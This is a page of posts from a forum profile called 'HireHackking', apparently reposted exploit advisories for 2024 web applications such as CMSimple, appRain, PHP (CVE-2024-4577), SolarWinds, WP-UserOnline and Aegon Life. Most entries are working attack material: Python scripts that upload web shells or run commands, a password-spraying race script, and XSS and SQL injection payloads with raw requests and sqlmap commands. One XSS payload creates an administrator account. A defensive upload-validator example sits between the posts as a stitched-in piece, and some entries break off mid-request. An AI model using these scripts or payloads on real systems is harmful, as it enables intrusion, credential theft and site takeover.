
HireHackking


Everything posted by HireHackking

  1. # Exploit Title: CMSimple 5.15 - Remote Command Execution
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.cmsimple.org
# Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip
# Version: latest
# Tested on: MacOS

# Log in to SimpleCMS.
# Go to Settings > CMS
# Append ",php" to the end of the Extensions_userfiles field and save it.
# Navigate to Files > Media
# Select and upload shell.php
# Your shell is ready: https://{url}/userfiles/media/shell.php
  2. # Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599

# Description:
----------------
A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.

# Payload:
----------------
<script>alert(document.domain)</script>

# Attack Vectors:
-------------------------
To exploit this vulnerability, use <script>alert(document.domain)</script>; when a user visits Client.php, the XSS is triggered.

# Burp Suite Request:
----------------------------
POST /lims/insertClient.php HTTP/1.1
Host: localhost
Content-Length: 30423
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/lims/addClient.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_id"

1716051159
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_password"

password
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"
Content-Type: application/octet-stream

ÿØÿà
  3. # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.apprain.org
# Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
# Version: latest
# Tested on: MacOS

```
import requests
import sys
import time
import random
import string

def generate_filename():
    """
    Generate a 5-character random string for filename.
    """
    return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"

def login(site, username, password):
    print("Logging in...")
    time.sleep(2)
    login_url = f"https://{site}/admin/system"
    session = requests.Session()
    login_data = {
        'data[Admin][admin_id]': username,
        'data[Admin][admin_password]': password
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    response = session.post(login_url, data=login_data, headers=headers)
    if "Logout" in response.text:
        print("Login Successful!")
        return session
    else:
        print("Login Failed!")
        sys.exit()

def upload_shell(session, site):
    print("Shell preparing...")
    time.sleep(2)
    filename = generate_filename()
    upload_url = f"https://{site}/admin/filemanager/upload"
    files = {
        'data[filemanager][image]': (filename, "<html><body><form method='GET' name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT' name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT' value='Execute'></form><pre><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
    }
    data = {
        'submit': 'Upload'
    }
    response = session.post(upload_url, files=files, data=data)
    if response.status_code == 200 and "uploaded successfully" in response.text:
        print(f"Your Shell is Ready: https://{site}/uploads/filemanager/(unknown)")
    else:
        print("Exploit Failed!")
        sys.exit()

if __name__ == "__main__":
    print("Exploiting...")
    time.sleep(2)
    if len(sys.argv) != 4:
        print("Usage: python exploit.py sitename.com username password")
        sys.exit()
    site = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    session = login(site, username, password)
    upload_shell(session, site)
```
  4. # Exploit Title: Persistent XSS in XMB 1.9.12.06
# Date: 06/12/2024
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.xmbforum2.com/
# Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip
# Version: 1.9.12.06
# Tested on: Windows XP
# CVE: N/A

## Vulnerability Details

A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06. The vulnerability allows an attacker to inject malicious JavaScript code into a template or specific fields. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities.

### XSS in Template

An attacker can inject malicious JavaScript code into a template:

1. Login as Admin: Access the XMB Forum with admin privileges.
2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look & Feel" select "Templates". This will go to `/cp2.php?action=templates`. Select the "footer" template and click edit.
3. Enter Payload: Add the XSS payload in the footer template: <script>alert('XSS');</script>
4. Save the Change: Click "Submit Changes".
5. Trigger the Payload: The XSS payload will trigger anywhere the footer template is rendered.

### XSS in News Ticker

An attacker can inject malicious JavaScript code into the News Ticker field of the Front Page Options:

1. Login as Admin: Access the XMB Forum with admin privileges.
2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Settings" go to "Front Page Options".
3. Enter Payload: Add the XSS payload in the "News in Newsticker" field: <img src=x onerror=alert(1)>
4. Save the Change: Click "Submit Changes".
5. Trigger the Payload: The XSS payload will trigger anywhere the News Ticker is displayed, e.g. the home page.
  5. # Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored)
# Date: 06/12/2024
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.94cb.com/
# Software Link: https://github.com/lincanbin/Carbon-Forum
# Version: 5.9.0
# Tested on: Windows XP
# CVE: N/A

## Vulnerability Details

A persistent (stored) XSS vulnerability was discovered in Carbon Forum version 5.9.0. The vulnerability allows an attacker to inject malicious JavaScript code into the Forum Name field under the admin settings. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities.

## Steps to Reproduce

1. Login as Admin: Access the Carbon Forum with admin privileges.
2. Navigate to Settings: Go to the '/dashboard' and select the Basic section.
3. Enter Payload: Input the following payload in the Forum Name field: <script>alert('XSS');</script>
4. Save Settings: Save the changes.
5. The XSS payload will trigger.
  6. # Exploit Title: Life Insurance Management System- SQL injection vulnerability.
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36597

# Description:
----------------
Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php. Important user data or system data may be leaked and system security may be compromised. Then the environment is secure and the information can be used by malicious users.

# Payload:
------------------
client_id=1511986023%27%20OR%201=1%20--%20a

# Steps to reproduce
--------------------------
- Login with your creds
- Navigate to this directory - /client.php
- Click on client Status
- Will navigate to /clientStatus.php
- Capture the request in burp and inject the SQLi query in the client_id= field

# Burp Request
-------------------
GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
Host: localhost
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close
  7. # Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
# Google Dork: inurl:"Powered by Boelter Blue"
# Date: 2024-06-04
# Exploit Author: CBKB (DeadlyData, R4d1x)
# Vendor Homepage: https://www.boelterblue.com
# Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
# Version: 1.3
# Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
# CVE: CVE-2024-36840

## Vulnerability Details:

### Description:
Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.

Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=10071 AND 4036=4036

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)

    Type: UNION query
    Title: Generic UNION query (NULL) - 44 columns
    Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

1. **news_details.php?id** parameter:
   sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs

2. **services.php?section** parameter:
   sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs

3. **location_details.php?id** parameter:
   sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs

Impact:
Unauthorized access to the database. Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials. Account takeovers and potential full control of the affected application.

Discoverer(s)/Credits: CBKB (DeadlyData, R4d1x)

References:
https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840
  8. # Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2024-06-12
# Exploit Author: Onur Göğebakan
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: WordPress 6.5.4 - Windows 10
# CVE : CVE-2022-2941

# Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability.

# Exploit:
1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
2. Click Save and intercept the request.
3. Change the `naming%5Bbots%5D` parameter value to the payload below
```
%3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
```
4. The payload is executed when a user visits http://poc.test/wp-admin/index.php?page=useronline
5. An administrator user is added with admin:admin credentials.

# Decoded payload
```
function handleResponse() {
    var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/wp-admin/user-new.php', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    var params = 'action=createuser&_wpnonce_create-user=' + nonce + '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' + '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
    changeReq.send(params);
}
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/wp-admin/user-new.php', true);
req.send();
```
  9. # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

```
from requests import Request, Session
import sys
import json

def title():
    print('''
 _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______
 / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / /
| | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / /
| |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / /
 \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/

    Author: Yesith Alvarez
    Github: https://github.com/yealvarez
    Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')

def exploit(url, command):
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped, verify=False, timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)
        #print(payload)
        print(resp.status_code)
        print(resp.text)

if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])
```
  10. # Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2024-06-23
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://flatboard.org/
# Version: 3.2

# PoC:
1- Log in to the admin panel, go to this url: https://127.0.0.1//Flatboard/index.php/forum
2- Click Add Forum and write your payload in the Information field: "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
3- Save it, the payload will be executed
  11. # Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
# Date: 24-06-2024
# CVE: N/A (Awaiting ID to be assigned)
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
# Category: Web Application
# Version: 1.0
# Tested on: Windows 10 | Xampp v3.3.0
# Vulnerable endpoint: http://localhost/farm/product.php

```
import requests
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

def upload_backdoor(target):
    upload_url = f"{target}/farm/product.php"
    shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"

    # Prepare the payload
    payload = {
        'category': 'CHICKEN',
        'product': 'rce',
        'price': '100',
        'save': ''
    }

    # PHP code to be uploaded
    command = "hostname"
    data = f"<?php system('{command}');?>"

    # Prepare the file data
    files = {
        'productimage': ('web-backdoor.php', data, 'application/x-php')
    }

    try:
        print("Sending POST request to:", upload_url)
        response = requests.post(upload_url, files=files, data=payload, verify=False)

        if response.status_code == 200:
            print("\nResponse status code:", response.status_code)
            print(f"Shell has been uploaded successfully: {shell_url}")

            # Make a GET request to the shell URL to execute the command
            shell_response = requests.get(shell_url, verify=False)
            print("Command output:", Fore.GREEN + shell_response.text.strip())
        else:
            print(f"Failed to upload shell. Status code: {response.status_code}")
            print("Response content:", response.text)
    except requests.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost"  # Change this to your target
    upload_backdoor(target)
```
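Posts 1, 3 and 11 above all reach code execution the same way: a file whose name or content the server should never have accepted (".php" appended to an admin-editable extension list, a ".inc" body uploaded with an image/jpeg content type, a ".php" file saved under a product-image directory) is written somewhere the web server will execute it. The following is an added example, not code from any of those posts or projects: a Python upload validator that applies the controls a defender would want on such an endpoint, namely a hard deny-list of server-side extensions checked in every position of the name, an extension allow-list, a magic-byte check of the body against the claimed type, and stripping of any directory component. The allow-list, the deny-list and the sample uploads are constructed assumptions, not taken from the affected products.

```python
import os
import re

# Constructed allow-list: the only extensions an image upload endpoint accepts,
# each paired with the magic bytes the body must start with.
IMAGE_ALLOWLIST = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Extensions a PHP host may hand to the interpreter or to Apache's config parser.
# They are refused in every position of the name, so an admin-editable extension
# list or a permissive file manager cannot re-enable them (constructed set).
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc", "htaccess"}

SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, content_head):
    """Decide whether an uploaded file may be stored under an image directory.

    filename     -- the client-supplied name (never trusted as a path)
    content_head -- the first bytes of the body (8 are enough for the magic checks here)
    Returns (accepted, detail); detail is the stored name on success, else the reason.
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory component
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[-1] == "":
        return False, "missing extension"
    for ext in parts[1:]:                                   # every extension, not only the last
        if ext in SERVER_SIDE_EXTENSIONS:
            return False, f"server-side extension '{ext}'"
    ext = parts[-1]
    if ext not in IMAGE_ALLOWLIST:
        return False, f"extension '{ext}' not in allow-list"
    if len(parts) != 2:
        return False, "multiple extensions"
    if not SAFE_STEM.match(parts[0]):
        return False, "unsafe base name"
    if not content_head.startswith(IMAGE_ALLOWLIST[ext]):   # body must match the claimed type
        return False, f"content does not match extension '{ext}'"
    return True, f"{parts[0]}.{ext}"


# Constructed sample uploads shaped like the ones described in the posts above.
SAMPLE_UPLOADS = [
    ("shell.php", b"<?php system($_GET['cmd']); ?>"),
    ("abcde.inc", b"<html><body><form"),
    ("web-backdoor.php", b"<?php system('hostname');?>"),
    ("photo.php.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("runme.jpg_original", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("photo.jpg", b"<?php echo 1; ?>"),
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("../../evil.png", b"\x89PNG\r\n\x1a\n\x00\x00"),
]


def run_samples(samples=SAMPLE_UPLOADS):
    """Return (name, accepted, detail) for each sample upload."""
    return [(name, *validate_upload(name, head)) for name, head in samples]


if __name__ == "__main__":
    for name, accepted, detail in run_samples():
        print(f"{'ACCEPT' if accepted else 'REJECT':6} {name!r:24} {detail}")
```

The stored name returned on success is derived only from the validated stem and extension; in a real endpoint it is better still to replace the stem with a server-generated random name, and to serve the upload directory with script execution disabled so a validator bug alone cannot become code execution.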
  12. # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
# Date: 20-06-2024
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://automad.org
# Software Link: https://github.com/marcantondahmen/automad
# Category: Web Application [Flat File CMS]
# Version: 2.0.0-alpha.4
# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

# Description
A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities.

# Proof-of-Concept
*Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home
*Step-2:* There will be a default Welcome page. You will find an option to edit it.
*Step-3:* Navigate to the Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named ***`Main`***
*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>

*Request:*
POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

*Response:*
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}

*Step-5:* XSS triggers when you go to the homepage - http://localhost/
  13. # Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"
# Date: 28/11/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-49976

*Steps to reproduce:*
1- Log in to the application.
2- Visit the ticket creation/editing page.
3- Create/Edit a ticket and insert the malicious payload into the "subject" field/parameter.

Payload: <dt/><b/><script>alert(document.domain)</script>
  14. # Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition
# CVE: CVE-2024-28999
# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions
# Author: Elhussain Fathy, AKA 0xSphinx

```
import requests
import urllib3
import asyncio
import aiohttp

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')

# host = '192.168.1.1'
# username = "admin"
# file_path = "passwords.txt"

host = input("Enter the host: ")
username = input("Enter the username: ")
file_path = input("Enter the passwords file path: ")

exploited = 0
url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"

passwords = []
with open(file_path, 'r') as file:
    for line in file:
        word = line.strip()
        passwords.append(word)

print(f"Number of tested passwords: {len(passwords)}")

headers = {
    'Host': host,
}

sessions = []
for _ in range(len(passwords)):
    response = requests.get(url, headers=headers, verify=False, stream=False)
    cookies = response.headers.get('Set-Cookie', '')
    session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]
    sessions.append(session_id)

async def send_request(session, username, password):
    headers = {
        'Host': host,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',
    }
    data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'
    async with aiohttp.ClientSession() as session:
        async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:
            if response.status == 302:
                global exploited
                exploited = 1
                print(f"Exploited Successfully Username: {username}, Password: {password}")

async def main():
    tasks = []
    for i in range(len(passwords)):
        session = sessions[i]
        password = passwords[i]
        task = asyncio.create_task(send_request(session, username, password))
        tasks.append(task)
    await asyncio.gather(*tasks)

asyncio.run(main())

if(not exploited):
    print("Exploitation Failed")
```
  15. # Exploit Title: Stored XSS in Microweber
# Date: 06/18/2024
# Exploit Author: tmrswrr
# Vendor Homepage: (https://microweber.me/)
# Version: 2.0.15
# Tested on: (http://active.demo.microweber.me/)

## Vulnerability Description

A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce

1. Log in to the application.
2. Navigate to `Users > Edit Profile`.
3. In the `First Name` field, input the following payload: "><img src=x onerror=confirm(document.cookie)>
4. Save the changes.
5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
  16. # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
# Date: 2024-06-03
# Exploit Author: Buğra Enis Dönmez
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
# Demo Site: https://azon-dominator.webister.net/
# Tested on: Arch Linux
# CVE: N/A

### Request ###

POST /fetch_products.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/
Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
Content-Length: 79
Accept-Encoding: gzip,deflate,br
